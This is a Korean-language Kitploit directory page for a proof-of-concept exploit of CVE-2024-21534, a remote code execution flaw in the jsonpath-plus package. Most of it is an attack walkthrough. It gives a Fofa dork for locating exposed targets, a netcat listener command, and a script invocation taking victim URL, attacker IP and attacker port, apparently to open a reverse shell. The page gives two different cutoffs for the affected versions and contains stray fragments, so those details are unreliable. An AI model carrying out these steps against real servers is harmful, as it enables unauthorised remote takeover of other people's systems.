Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization | Kitploit
도구/GitHubGitHub/verylazytech/cve-2024-21534
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access Tool
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization

저장소 보기
511년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

POC - CVE-2024-21534 Jsonpath-plus, 부적절한 입력 검증으로 인한 원격 코드 실행(RCE) 취약점

My Shop Medium Github Buy Me A Coffee

개요

CVE-2024-21534는 jsonpath-plus 패키지의 10.0.0 이전 버전에서 발견된 심각한 취약점입니다. 이 취약점은 부적절한 입력 검증에서 비롯되며, 영향을 받는 시스템에서 원격 코드 실행(RCE)으로 이어질 수 있습니다. 이 취약점은 인증 없이도 악용될 수 있어 특히 위험하며, 공격자는 특수하게 조작된 입력을 전송하여 서버에서 임의의 코드를 실행할 수 있습니다. 이 문제는 안전하지 않은 기본 Node.js vm 모듈 사용에서 발생하며, 악용될 경우 전체 시스템이 손상될 수 있습니다.

영향을 받는 버전

10.2.0 이전의 jsonpath-plus 버전

영향을 받는 구성 요소

취약점은 애플리케이션에서 JSON 데이터 구조를 쿼리하는 데 널리 사용되는 jsonpath-plus 패키지에 있습니다. 이 결함은 부적절한 입력 검증으로 인해 악성 코드 실행을 허용합니다.

자세히 알아보기 — CVE-2024-21534

면책 조항: 이 개념 증명(POC)은 교육 및 윤리적 테스트 목적으로만 제작되었습니다. 이 도구를 사전 상호 동의 없이 대상을 공격하는 데 사용하는 것은 불법입니다. 최종 사용자는 모든 해당 지역, 주 및 연방 법률을 준수할 책임이 있습니다. 개발자는 어떠한 책임도 지지 않으며, 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

시작하기

대상 찾기

잠재적 대상을 찾으려면 Fofa(Shodan.io와 유사)를 사용하세요:

  • Fofa Dork: Jsonpath-plus

Fofa

저장소 클론

먼저 저장소를 클론하세요:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

이제 nc를 사용하여 리스너를 엽니다:

root@kitploit:~
nc -lnvp 443

익스플로잇 실행:

Linux / macOS의 경우:

URL이 취약한 jsonpath-plus 패키지를 통해 사용자 입력을 처리하는 엔드포인트를 가리키는지 확인하십시오. 그래야 RCE 취약점을 악용할 수 있습니다.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

일부 디렉토리 나열:

last

도구 다운로드